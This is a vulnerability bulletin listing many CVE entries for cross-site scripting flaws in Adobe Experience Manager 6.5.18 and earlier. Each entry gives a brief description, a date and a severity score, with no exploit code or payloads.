adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48479
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48480
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48481
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48482
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48483
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48484
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48485
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48486
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48487
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48488
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48489
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48490
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48491
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48492
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48493
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48494
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48495
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48496
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48497
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48498
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48499
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48500
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48501
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48502
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48503
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48504
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48505
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48506
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48507
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48508
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48509
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48510
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48511
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48512
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48513
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48514
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48515
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48516
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48517
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48518
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48519
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48520
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48521
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48522
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48523
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48524
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48525
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48526
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48527
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48528
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48529
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48530
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48531
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48532
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48533
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48534
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48535
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48536
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48537
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48538
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48539
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48540
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48541
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48542
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48543
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48544
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48545
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48546
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48547
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48548
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48549
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48550
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48551
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48552
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48553
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48554
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48555
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48556
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48557
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48558
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48559
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48560
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48561
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48562
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48563
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48564
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48565
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48566
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48567
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser. | 2023-12-15 | 5.4 | CVE-2023-48568
psirt@adobe.com
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48569
psirt@adobe.com
